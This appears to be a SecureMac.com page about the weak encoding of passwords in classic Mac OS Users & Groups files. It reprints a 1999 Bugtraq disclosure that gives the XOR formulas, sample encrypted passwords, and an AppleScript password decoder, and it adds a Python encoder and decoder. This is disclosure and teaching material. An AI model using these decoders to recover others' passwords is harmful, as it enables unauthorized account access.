SecureMac.com

Decrypt-a-tron is an application that decrypts the Apple password algorithm, created by System Coyboy.

macfspwd.c is a C program that decrypts the Apple password algorithm, created by Nate Pierce. It is distributed as C source, so you can use a C compiler or a Unix machine to build and run it.

Nate Pierce has written a second edition of his macfspwd.c for the Apple encryption algorithm. The 2nd revision adds the possibility of running like grep: macfspwd2 [accountname] [users & groups db filename] It currently pulls out all occurrences of the account name in the file, but I'll look into how to limit it to just the entry with the encrypted password. Later I'll try to figure out how to read the userlist from the file and extract all passwords. Again, use at your own risk...

Apple.com has set up a conference, or discussion list, with Q&A about the Apple encryption algorithm. Read it to keep up with the ideas and the ways around it.


	

Date: Sat, 10 Jul 1999 15:28:17 +0200
From: Dawid adix Adamski
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: MacOS system encryption algorithm



The encryption algorithm in MacOS system is simple and the password can be easily decoded.

Password is stored in Users & Groups Data File in Preferences folder. Offset is different on each system and depends on Users & Groups configuration, but it always lies after owner's username. It's not so difficult to find it using hex editor, even if we don't know owner's username.



Here are some examples of encrypted passwords:
00 04 06 18 0D 0A 19 0B = stayaway
0A 1F 10 1B 00 07 75 1E = yellow
1C 1B 16 14 12 62 10 7B = owner
07 02 13 1A 1E 0F 1A 14 = turnpage
27 25 33 27 27 39 24 7E = Trustno1

AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh

where:
AA BB CC DD EE FF GG HH - encrypted password (hex)
aa bb cc dd ee ff gg hh - decrypted password in ASCII codes (hex)

aa=AA XOR 73H
bb=BB XOR AA XOR 70H
cc=CC XOR BB XOR 63H
dd=DD XOR CC XOR 67H
ee=EE XOR DD XOR 74H
ff=FF XOR EE XOR 70H
gg=GG XOR FF XOR 72H
hh=HH XOR GG XOR 6BH



An example:
Let's take 00 04 06 18 0D 0A 19 0B

00H XOR 73H = 73H = s
04H XOR 00H = 04H; 04H XOR 70H = 74H = t
06H XOR 04H = 02H; 02H XOR 63H = 61H = a
18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y
0DH XOR 18H = 15H; 15H XOR 74H = 61H = a
0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w
19H XOR 0AH = 13H; 13H XOR 72H = 61H = a
0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y



tested on:
MacOS 7.5.3, 7.5.5, 8.1, 8.5

I wrote an apple script to break passwords



--------CUT HERE--------
(* MacOS Pass 2.1 by adix 15.06.99; Apple Script English *)
-- Input is read two hex digits per byte, so enter the hex string without spaces.
-- Identifiers are Polish: ile = count, skok = offset, razem = combined, zn = characters.
global lbin, bit1, bit2, bitk
set hex1 to text returned of (display dialog "Enter encrypted password (hex): " default answer "" buttons {" Ok "} default button " Ok " with icon stop)
-- Alicia holds the eight XOR constants 73 70 63 67 74 70 72 6B as a bit string
set Alicia to "0111001101110000011000110110011101110100011100000111001001101011"
set pass to ""
set lbin to ""
set razem to ""
set i to 1
set skok to 0
set ile to count items in hex1
if ile = 0 or ile = 1 then
set pass to ""
else
repeat until (i > (ile - 1))
  set kodascii to 0
  set razem to ""
  -- bits of the current stored byte
  set zn to items (i) thru (i + 1) in hex1
  set lbin to hex2bin(zn)
  -- XOR the current byte with its constant, bit by bit
  repeat with a from 1 to 8
   set bit1 to item (a + skok) of Alicia
   xor(a)
   set razem to {razem & bitk} as string
   if i < 2 then
    set kodascii to {kodascii + bitk * (2 ^ (8 - a))}
   end if
  end repeat
  if i < 2 then
   -- first byte: no previous byte to fold in
   set pass to {pass & (ASCII character kodascii)}
  else
   -- later bytes: XOR the result with the previous stored byte
   set zn to items (i - 2) thru (i - 1) in hex1
   set lbin to hex2bin(zn)
   repeat with a from 1 to 8
    set bit1 to item a of razem
    xor(a)
    set kodascii to {kodascii + bitk * (2 ^ (8 - a))}
   end repeat
   set pass to {pass & (ASCII character kodascii)}
  end if
  set skok to skok + 8
  set i to i + 2
end repeat
end if
display dialog "Password:   " & pass & return & return & "by adix" buttons {" Ok "} default button " Ok " with icon note

-- Convert a pair of hex digits to an 8-character bit string
on hex2bin(zn)
set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110", "0111", "1000", "1001", "1010", "1011", "1100", "1101", "1110", "1111"}
set t2hex to "0123456789ABCDEF"
set bin to ""
repeat with j in zn
  set t1 to j as string
  repeat with i from 1 to (count items in t2hex)
   if ((item i in t2hex) = t1) then
    set temp to (item i in temphex)
    exit repeat
   end if
  end repeat
  set bin to {bin & temp} as string
end repeat
return (bin)
end hex2bin

-- XOR global bit1 with bit a of global lbin; the result goes to global bitk
on xor(a)
set bit2 to item a in lbin
if bit1 = bit2 then
  set bitk to "0"
else
  set bitk to "1"
end if
end xor
--------CUT HERE--------



Dawid adix Adamski
adixx@friko4.onet.pl
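
The formulas in the message above, restated in Python as an added example (not part of the original post or of the tools mentioned on this page). It checks all five quoted samples and shows that each one yields the same eight constants. The function names are this example's own, and the zero padding of short passwords is inferred from the trailing 00 bytes the shorter samples decode to.

```python
# Added example (not from the original post). Constants and sample pairs are
# copied from the message; function names are this example's own.
KEY = bytes.fromhex("73 70 63 67 74 70 72 6B")  # the eight XOR constants

SAMPLES = {  # stored bytes (hex) -> password, as quoted in the message
    "00 04 06 18 0D 0A 19 0B": b"stayaway",
    "0A 1F 10 1B 00 07 75 1E": b"yellow",
    "1C 1B 16 14 12 62 10 7B": b"owner",
    "07 02 13 1A 1E 0F 1A 14": b"turnpage",
    "27 25 33 27 27 39 24 7E": b"Trustno1",
}

def _unchain(stored: bytes, other: bytes) -> bytes:
    """Compute stored[i] XOR stored[i-1] XOR other[i], taking stored[-1] as 0."""
    if len(stored) != len(other):
        raise ValueError("both inputs must have the same length")
    out, prev = bytearray(), 0
    for s, o in zip(stored, other):
        out.append(s ^ prev ^ o)
        prev = s
    return bytes(out)

def decode(stored: bytes) -> bytes:
    """Apply the message's formulas and drop the trailing 00 padding."""
    return _unchain(stored, KEY).rstrip(b"\x00")

def encode(password: bytes) -> bytes:
    """Inverse of decode, derived here by inverting the formulas (assumption)."""
    if len(password) > len(KEY):
        raise ValueError("the message only describes 8 stored bytes")
    out, prev = bytearray(), 0
    for p, k in zip(password.ljust(len(KEY), b"\x00"), KEY):
        prev ^= p ^ k  # each stored byte folds in the previous stored byte
        out.append(prev)
    return bytes(out)

def constants_from_pair(stored: bytes, password: bytes) -> bytes:
    """Solve the same formulas for the constants, given one known pair."""
    return _unchain(stored, password.ljust(len(stored), b"\x00"))

if __name__ == "__main__":
    for hex_bytes, password in SAMPLES.items():
        stored = bytes.fromhex(hex_bytes)
        same = constants_from_pair(stored, password) == KEY
        print(hex_bytes, "->", decode(stored).decode("ascii"), "| same constants:", same)
```

Because every sample resolves to the same constants, the stored value depends on nothing secret or per-system: the scheme is a reversible encoding, and the only protection for the password is access control on the Users & Groups Data File itself.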







All material (c) 2014 SecureMac.com and respected owners